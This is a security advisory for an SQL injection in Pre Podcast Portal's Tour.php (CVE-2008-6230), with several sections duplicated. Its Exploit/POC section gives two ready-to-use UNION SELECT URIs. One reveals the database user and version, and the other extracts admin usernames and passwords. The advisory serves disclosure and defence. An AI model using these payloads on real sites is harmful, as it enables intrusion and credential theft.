Pre Podcast Portal 'Tour.php' SQL Injection Vulnerability
BID:32124
Info
Pre Podcast Portal 'Tour.php' SQL Injection Vulnerability
| Bugtraq ID: | 32124 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6230 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 05 2008 12:00AM |
| Updated: | Apr 16 2015 05:51PM |
| Credit: | G4N0K |
| Vulnerable: |
Pre Projects Pre Podcast Portal 0 |
| Not Vulnerable: | |
Discussion
Pre Podcast Portal 'Tour.php' SQL Injection Vulnerability
Pre Podcast Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pre Podcast Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Pre Podcast Portal 'Tour.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
http://www.example.com/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
http://www.example.com/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
Solution / Fix
Pre Podcast Portal 'Tour.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
References
Pre Podcast Portal 'Tour.php' SQL Injection Vulnerability
References:
References:
- Pre Podcast Portal Homepage (Pre Projects)